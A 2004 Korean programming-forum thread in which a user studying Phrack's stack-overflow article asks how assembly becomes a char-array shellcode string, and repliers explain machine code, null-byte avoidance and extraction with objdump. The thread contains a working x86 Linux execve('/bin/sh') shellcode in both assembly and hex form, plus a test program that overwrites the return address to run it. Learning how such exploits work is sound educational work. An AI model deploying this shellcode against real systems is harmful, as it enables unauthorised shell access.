스택오버플로에서.. 어셈코드를 char 변수에 집어넣을때 변환법?
글쓴이: jenix / 작성시간: 수, 2004/02/04 - 11:59오후
안녕하세요..
phrack 의 스택오버플로우 관련 문서를 보고있었는데요.
음..이건 예전부터 궁금하던건데..
스택오버플로우를 발생시킬때..
간결하게 작성한 어셈코드를 char 변수에 들어가는 형식(?) 으로 변환시켜서..
인풋값 등에 그 코드를 집어넣어서 발생시키는게..
가장 간단한..스택오버플로우로 알고있는데요..음..
다음과 같은코드에서..
어셈코드를.. char 변수에 집어넣는 형식으로 어떻게 바꾸는지 궁금하네요 :cry:
일반적인 어셈책에는 안나와있는거 같은데..
도움좀 부탁드립니다~~
shellcodeasm2.c
------------------------------------------------------------------------------
void main() {
__asm__("
jmp 0x1f # 2 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes
xorl %eax,%eax # 2 bytes
movb %eax,0x7(%esi) # 3 bytes
movl %eax,0xc(%esi) # 3 bytes
movb $0xb,%al # 2 bytes
movl %esi,%ebx # 2 bytes
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
xorl %ebx,%ebx # 2 bytes
movl %ebx,%eax # 2 bytes
inc %eax # 1 bytes
int $0x80 # 2 bytes
call -0x24 # 5 bytes
.string \"/bin/sh\" # 8 bytes
# 46 bytes total
");
}
------------------------------------------------------------------------------
And our new test program:
testsc2.c
------------------------------------------------------------------------------
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main() {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
Forums:
일단.. 이건 쉘코드라고 하는거에요.2진수 -> 16진수가 편해
일단.. 이건 쉘코드라고 하는거에요.
2진수 -> 16진수가 편해서 16진수를 쓰는건 아시죠?
쉘을 실행하는 execve("/bin/bash...);
랑.. exit(0); 이 코드 두개를요..
어셈블리어로 짜서 컴파일한뒤에요..(시스템콜이죠)
0x00 같은 공백이 없도록 movl movw movb .. 이렇게 끝자리 명령어세트의 끝에.. 크기거든요.. long word byte.. 맞춰서 컴파일한뒤에요..
작동잘되면, 그걸 gdb 나 objdump -d 파일.. 해서..
main 함수부터 보는거에요..
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
쉘코드보시면 아시지만 메인에서 끝으로 점프해서 /bin/sh 라는 문자열데이타가 초기화되고.. 팝되고..이러쿵 저러쿵 하고 execve 함수호출해서 쉘실행하고 종료하는 코드가 담겨진.. 16진수형태(\x) 에요..
아시겠죠? 프로그램 코드를.. 쭈욱 이어놓은거에요..
쉘코드 관련 문서를 찾아보세요..
힘내세요.
char[]에 들어가는 건 기계어입니다.어셈블러로 어셈블할때 리스
char[]에 들어가는 건 기계어입니다.
어셈블러로 어셈블할때 리스트 파일 출력하도록 하면 기계어 코드가 나옵니다.
그걸 직접 16진수 데이터로 넣는겁니다. 더 고난이도로 한다면 어셈블리
안쓰고 CPU 매뉴얼의 명령어 세트보고 직접 짤 수도 있긴 있습니다.
그리고 2진수와 16진수의 변환은 별다른 곱셈 나눗셈 필요 없이 2진수 4자리가
16진수 한자리로 바뀝니다. (오른쪽 1의 자리 기준으로 해서)
Written By the Black Knight of Destruction
댓글 달기